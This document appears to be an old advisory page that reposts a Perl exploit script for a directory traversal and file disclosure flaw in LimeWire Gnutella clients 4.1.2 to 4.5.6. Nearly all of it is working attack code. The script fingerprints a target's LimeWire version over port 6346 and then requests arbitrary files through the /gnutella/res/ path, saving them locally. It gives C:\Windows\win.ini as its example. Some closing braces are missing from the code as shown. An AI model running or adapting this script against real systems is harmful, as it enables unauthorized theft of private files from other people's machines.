LimeWire File Disclosure ExploitSummary
This script exploits recently reported vulnerability in LimeWire Gnutella client, LimeWire Gnutella Client Directory Traversal and File Disclosure. The script allows fetching text files from system running vulnerable versions of LimeWire.
The information has been provided by Marco van Berkum.
Vulnerable Systems:
* LimeWire versions 4.1.2 up to version 4.5.6
# exploits LimeWire 4.1.2 - 4.5.6
# This is just a quick and dirty script to grab textfiles. Doesn't work on binaries.
# Note: Using this code to 'hack' LimeWire clients other than your own is illegal and should NOT be done!
# (c)2005 Marco van Berkum
use IO::Socket;
if(!$ARGV[2] || $ARGV[1] !~ /\\/) {
die "Usage: ./ host \"file you want\" outputfile [nondefaultport if needed]\n\nExample: ./ \"C:\\Windows\\win.ini\" win.ini \(don\'t forget the quotes\)\nUse the silly DOS way when requesting files with spaces, Progra~1 etc..\n\n";
$host = $ARGV[0];
$file = $ARGV[1];
$outputfile = $ARGV[2];
$port = $ARGV[3];
$readtimeout = "15"; # set longer for big files
if(!$port) { $port = 6346; }
# open sock
my $sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => '5') || die "Connection refused\n";
# wheee socket;
if($sock) {
print $sock "HEAD ?\n\n";
sysread($sock, $buff, 1000);
($temp, $server, $temp) = split(/Request|Content-Type/,$buff);
($temp, $version) = split(/Server: /,$server);
if($version =~ /limewire/i) {
($temp, $versionnodots) = split(/\//,$version);
$versionnodots =~ s/\.//g;
if($versionnodots >= 412 && $versionnodots <= 456) {
print("Vulnerable LimeWire!\n");
} else { die "Not a vulnerable LimeWire server \:\(\n"; }
} else { die "Not a LimeWire server!\n" }
print "Requesting file: $file.....\n";
my $sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => '5') || die "Connection refused, host died?\n";
# wheee socket;
if($sock) {
print $sock "GET /gnutella/res/$file HTTP/1.1\n\n";
sysread($sock, $buff, 9999999);
if($buff =~ /200 OK/) {
print "\nGot it!\nYUO ARE TEH HAX0R NOW!!!1111oneoneone\n";
print "Thanks for using teh LimeWire haxx0rpr0ggie, the file is saved as $outputfile!\n";
($temp, $data) = split(/Content-Length:.*/,$buff);
$data =~ s/^\n//g;
open FILE, ">$outputfile";
print FILE "$data";
close FILE;
} else {
print "File not found!\n";